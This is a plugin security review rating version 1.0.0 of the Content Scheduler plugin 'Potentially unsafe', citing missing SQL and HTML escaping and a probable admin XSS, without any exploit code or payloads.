Plugin inspection:

Content Scheduler

Potentially unsafe

Last revised:

Confidence: Medium
This plugin has been given a short, targeted code review.

Before using this plugin, you should very carefully consider its potential problems and should conduct a thorough assessment. Read more about this recommendation.

Warnings

This recommendation applies to version 1.0.0 of this plugin, but the most recent version is 2.0.5. These findings may no longer be correct.

Findings

This plugin is poorly-written. Among the issues identified are:

  • No SQL escaping (but it does not immediately appear exploitable).
  • No HTML escaping, may be vulnerable to XSS attacks.
  • Produces many PHP notices during normal operation.
  • Code is idiosyncratic in places. Sometimes uses include() where a function would be more appropriate (see line 555 of content-scheduler.php for an instance of this).

We are confident more problems would be found on a deeper inspection of the code.

Reason for the 'Potentially unsafe' result

The plugin contains or is likely to contain a vulnerability which could be exploited by an end user and which would compromise the site’s confidentiality, integrity or availability:

Probable admin XSS which could be used by an editor/author to hijack an administrator session.

Failure criteria

  • Lack of input sanitisation
  • Execution of unprepared SQL statements
  • Lack of proper output escaping

Read more about our failure criteria.